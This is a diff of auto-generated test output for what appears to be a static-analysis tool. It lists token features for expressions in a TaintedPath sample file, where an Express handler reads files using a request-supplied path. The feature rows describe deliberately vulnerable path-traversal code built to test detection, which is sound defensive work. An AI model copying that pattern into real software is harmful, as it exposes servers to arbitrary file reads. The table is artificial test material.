autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | exceptional return of pathMod ... .html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | exceptional return of pathMod ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | pathMod ... .html') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | pathMod ... .html') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | pathMod ... .html') | calleeImports | fs | @@ -8111,6 +72555,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | pathMod ... .html') | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | pathMod ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | pathMod ... .html') | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:120:30:120:33 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:30:120:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:120:30:120:33 | join | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:30:120:33 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:30:120:33 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:120:35:120:38 | path | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:120:35:120:38 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:120:35:120:38 | path | calleeImports | path | @@ -8129,6 +72578,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:120:41:120:52 | 'index.html' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:120:41:120:52 | 'index.html' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:120:41:120:52 | 'index.html' | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:10 | path | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:21 | path.startsWith | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | exceptional return of path.st ... r/www") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | exceptional return of path.st ... r/www") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | exceptional return of path.st ... r/www") | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | exceptional return of path.st ... r/www") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | exceptional return of path.st ... r/www") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | path.st ... r/www") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | path.st ... r/www") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | path.st ... r/www") | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | path.st ... r/www") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:122:7:122:39 | path.st ... r/www") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:122:12:122:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:122:12:122:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:122:12:122:21 | startsWith | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:122:12:122:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:122:12:122:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:122:23:122:38 | "/home/user/www" | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:122:23:122:38 | "/home/user/www" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:122:23:122:38 | "/home/user/www" | calleeImports | fs | @@ -8138,6 +72612,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:122:23:122:38 | "/home/user/www" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:122:23:122:38 | "/home/user/www" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:122:23:122:38 | "/home/user/www" | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:6 | fs | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:19 | fs.readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | fs.read ... c(path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:123:5:123:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:123:8:123:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:123:8:123:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:123:8:123:19 | readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:123:8:123:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:123:8:123:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:123:21:123:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:123:21:123:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:123:21:123:24 | path | calleeImports | fs | @@ -8147,6 +72646,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:123:21:123:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:123:21:123:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:123:21:123:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:4 | fs | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:17 | fs.readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | exceptional return of fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | exceptional return of fs.read ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | exceptional return of fs.read ... path)) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | exceptional return of fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | exceptional return of fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | fs.read ... path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | fs.read ... path)) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:3:125:45 | fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:125:6:125:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:6:125:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:125:6:125:17 | readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:6:125:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:6:125:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:28 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:28 | pathModule | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:33 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:33 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:33 | pathModule.join | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:33 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:33 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | exceptional return of pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | exceptional return of pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | pathMod ... , path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | pathMod ... , path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | pathMod ... , path) | calleeImports | fs | @@ -8156,6 +72695,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:125:19:125:44 | pathMod ... , path) | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:125:30:125:33 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:125:30:125:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:125:30:125:33 | join | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:125:30:125:33 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:125:30:125:33 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:125:35:125:37 | '.' | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:125:35:125:37 | '.' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:125:35:125:37 | '.' | calleeImports | path | @@ -8174,6 +72718,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:125:40:125:43 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:125:40:125:43 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:125:40:125:43 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:4 | fs | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:17 | fs.readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | exceptional return of fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | exceptional return of fs.read ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | exceptional return of fs.read ... path)) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | exceptional return of fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | exceptional return of fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | fs.read ... path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | fs.read ... path)) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:3:126:58 | fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:126:6:126:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:6:126:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:126:6:126:17 | readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:6:126:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:6:126:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:28 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:28 | pathModule | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:33 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:33 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:33 | pathModule.join | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:33 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:33 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | exceptional return of pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | exceptional return of pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | pathMod ... , path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | pathMod ... , path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | pathMod ... , path) | calleeImports | fs | @@ -8183,6 +72767,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:126:19:126:57 | pathMod ... , path) | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:126:30:126:33 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:126:30:126:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:126:30:126:33 | join | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:126:30:126:33 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:126:30:126:33 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:126:35:126:50 | '/home/user/www' | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:126:35:126:50 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:126:35:126:50 | '/home/user/www' | calleeImports | path | @@ -8201,6 +72790,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:126:53:126:56 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:126:53:126:56 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash 